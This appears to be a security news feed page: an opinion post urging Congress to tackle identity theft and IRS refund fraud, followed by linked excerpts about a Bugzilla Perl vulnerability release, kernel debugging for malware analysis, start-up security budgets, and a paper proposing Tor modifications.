As we all are aware the number of identity theft victims continues to rise significantly and this one is no exception. Even if you have the appropriate countermeasures in place you can still be victimized. Those safeguards may include signing up with an identity theft protection company, placing a fraud alert on your account or even placing a credit freeze. So I ask myself, why congress does not pass a law requiring all credit issuers to access a centralized database of people already known to be compromised? The law should require these credit entities and even the IRS to query the database, access verified contact numbers and call these victims before even issuing any credit inquiries. For those credit issuers who do not perform this query they should receive a substantial fine and/or pay damages to those who have been violated. Remember inquiries in and of itself, despite having a fraud alert, can impact ones credit.

Its also true that many of these protective services are not capable of safeguarding against false IRS refunds, The IRS in January of this year admits themselves that they have seen a significant increase in refund fraud that involves identity thieves who file false claims for refunds by stealing and using someone's Social Security number. They go on to say "In Fiscal Year (FY) 2013, the IRS initiated approximately 1,492 identity theft related criminal investigations, an increase of 66 percent over investigations initiated in FY 2012. Direct investigative time applied to identity theft related investigations has increased 216 percent over the last two years. (Source link: http://www.irs.gov/uac/Newsroom/IRS-Criminal-Investigation-Combats-Identity-Theft-Refund-Fraud).

The increase of 216 percent in the aforementioned sentence leads me to another point. That is due to this illegal activity productivity continues to fall dramatically while the costs to consumers, credit issuing entities and insurance companies alike are rising at a staggering rate. For example the time (even if you have implemented some sort of protective service) it takes for those who have been exploited to rectify their good names has become exorbitant.

So again. Congress make a move already. Enough is enough!

New Class of Vulnerability in Perl Web Applications

October 6, 2014, 10:44 pm
$
0
0
We did a Bugzilla security release today, to fix some holes responsibly disclosed to us by Check Point Vulnerability Research, to whom we are very grateful. The most serious of them would allow someone to create and control an account for an arbitrary email address they don’t own. If your Bugzilla gives group permissions based on someone’s email domain, as some do, this could be a privilege escalation.

These bugs are actually quite interesting, because they seem to represent a new Perl-specific security problem.

more here............http://blog.gerv.net/2014/10/new-class-of-vulnerability-in-perl-web-applications/

Syser + VirtualBox = Win

October 7, 2014, 4:00 am
$
0
0
Recently I’ve had to step into the awful world of kernel debugging. When malware drops a rootkit and conventional userland debugging falls short, you have to step into ring 0. Unfortunately, options are rather limited when it comes to decent ring0 debugging on windows.

more here...........http://www.gironsec.com/blog/2014/10/syser-virtualbox-win/

Start-Ups, Information Security, and Budgets

October 7, 2014, 4:02 am
$
0
0
THE 80'S WERE OK, I GUESS
As a child of the 80's, I was raised with a lot of mixed messages. These messages took a lot of bizarre forms. I distinctly remember Poison's "Open Up and Say Ahh" being re-released solely because parental groups were concerned that the devilish cover was somehow hypnotizing teens into a riotous hormonal rage. It surprised me, even at the tender age of nine, that somehow covering up the image except for the eyes would appease these groups that supposedly cared about decency.

more here..........http://blog.securitymouse.com/2014/10/start-ups-information-security-and.html

Paper: Another Tor is possible

October 7, 2014, 4:05 am
$
0
0
The aim of this paper is to introduce some modifications in Tor, in order to improve user’s anonymity
and relay’s security. Thus, we introduced a system that will ensure anonymity for all users, while
maintaining the ability to break the anonymity of a sender in case of misconduct. The revocation of
the anonymity will require the use of secret sharing schemes, since we assume that, the lifting of the
anonymity of the dishonest user should not depend on a single entity, but on a consensus within the
network. In addition to the revocation of the anonymity, we propose in this paper further improvements such as mixing Tor traffic with those of the major internet groups, using the camouflage, or introducing a honeypot in the network

more here.............http://eprint.iacr.org/2014/787.pdf
Viewing all 8064 articles
Browse latest View live
Search